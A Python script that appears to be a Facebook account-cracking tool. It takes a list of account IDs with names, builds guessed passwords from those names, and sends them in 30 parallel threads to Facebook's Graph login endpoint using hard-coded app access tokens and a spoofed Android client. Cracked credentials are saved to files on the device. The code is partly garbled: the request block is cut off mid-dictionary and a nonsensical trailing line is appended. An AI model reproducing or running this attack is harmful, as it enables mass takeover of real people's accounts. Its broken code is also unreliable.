#Coded by HANNAN . Modified by SIAM AHMED import os,time,random,re,sys,string, subprocess from concurrent.futures import ThreadPoolExecutor as tpe def file(): os.system("clear") file = input(f"{oo('-')}Enter File: ") try: for x in open(file,'r').readlines(): idx.append(x.strip()) except: md5(f"{oo('!')}File Not Found");time.sleep(1) main_menu() method() exit() """ ------Access Token------ Access Tokens. Change if necessary. Ads Manager Android : 438142079694454|fc0a7caa49b192f64f6f5a6d9643bb28 Facebook Android : 350685531728|62f8ce9f74b12f84c123cc23437a4a32 Facebook iPhone : 6628568379|c1e620fa708a1d5696fb991c1bde5662 Ads Manager App for iOS : 1479723375646806|afb3e4a6d8b868314cc843c21eebc6ae --------URL and Host-------- Graph : https://graph.facebook.com/auth/login/ B-Graph : https://b-graph.facebook.com/auth/login """ def method(): clear() lp = input(f'{oo("?")}Limit Passwords? : ') if lp.isnumeric(): pp=[] clear() ex = 'firstlast first123 last123' md5(f'{oo("+")}{ex} (ETC)') lin3() for x in range(int(lp)): pp.append(input(f'{oo(x+1)}Password : ')) else: md5(f"{oo('!')}Numeric Only");time.sleep(0.8) main_menu() clear() md5('\033[1;97m[+] Total Accounts For CraCk : \033[1;32m '+str(len(idx))) md5(f'\x1b[1;97m[✓] Dont Use Airplane mOde ;)') lin3() def start(user): try: global loop,idx,cll r = requests.Session() user = user.strip() acc, name = user.split("|") first = name.rsplit(" ")[0] try: last = name.rsplit(" ")[1] except: last = first pers = str(int(loop)/int(len(idx)) * 100)[:4] sys.stdout.write(f'\r {R}[{W}HANNAN{R}] {P}({Y}{loop}{W} / {W}{len(idx)}{P}) {W}• {G}{len(oku)}\r') sys.stdout.flush() loop+=1 for pswd in pp: heads="Dalvik/2.1.0 (Linux; U; Android 10; SM-N981B Build/QQ2A.591022.038) [FBAN/FB4A;FBAV/251.0.0.88.96;FBBV/849436448;FBRV/0;FBPN/com.facebook.katana;FBLC/fi_FI;FBMF/Samsung;FBBD/Samsung;FBDV/SM-N981B;FBSV/10;FBCA/armeabi-v7a:armeabi;FBDM/{density=2.0,width=720,height=1440};FB_FW/1;]" #Put Your user Agent Here pswd = pswd.replace(f'first',first.lower()).replace(f'First',first).replace(f'last',last.lower()).replace(f'Last',last).replace(f'Name',name).replace(f'name',name.lower()) header = { "Content-Type": "application/x-www-form-accencoded", "Host": "graph.facebook.com", "User-Agent": heads, "X-FB-Net-HNI": "45204", "X-FB-SIM-HNI": "45201", "X-FB-Connection-Type": "unknown", "X-Tigon-Is-Retry": "False", "x-fb-session-id": "nid=jiZ+yNNBgbwC;pid=Main;tid=132;nc=1;fc=0;bc=0;cid=d29d67d37eca387482a8a5b740f84f62", "x-fb-device-group": "5120", "X-FB-Friendly-Name": "ViewerReactionsMutation", "X-FB-Request-Analytics-Tags": "graphservice", "Accept-Encoding": "gzip, deflate", "X-FB-HTTP-Engine": "Liger", "X-FB-Client-IP": "True", "X-FB-Server-Cluster": "True", "x-fb-connection-token": "d29d67d37eca387482a8a5b740f84f62", "Connection": "Keep-Alive", } data={ "adid": str(uuid.uuid4()), "format": "json", "device_id": str(uuid.uuid4()), "cpl": "true", "family_device_id": str(uuid.uuid4()), "credentials_type": "device_based_login_password", "error_detail_type": "button_with_disabled", "source": "device_based_login", "email": acc, "password": pswd, "access_token": "350685531728|62f8ce9f74b12f84c123cc23437a4a32", "generate_session_cookies": "1", "meta_inf_fbmeta": "", "advertiser_id": str(uuid.uuid4()), "currently_logged_in_userid": "0", "locale": "en_US", "client_country_code": "US", "method": "auth.login", "fb_api_req_friendly_name": "authenticate", "fb_api_caller_class": "com.facebook.account.login.protocol.Fb4aAuthHandler", open('/sdcard/Hannan-Ok.txt','a').write(f'{acc}|{pswd}\n') break elif "User must verify their account" in response: cpu.append(acc) md5('\033[1;31m[CP] \033[1;31m'+acc+' \033[1;31m|\033[1;31m '+pswd) open('/sdcard/Hannan-CO.txt','a').write(f'{acc}|{pswd}\n') break else: continue except Exception as e: time.sleep(10) with tpe(max_workers=30) as tp: tp.map(start,idx) exit() (bytes-0.sound.(beep)*-R -T&url-splits(0)=4 main_menu() facebook apis being taken advantage of thumbnails and css color name code tools over a flaw in virtual reality through usb without being modified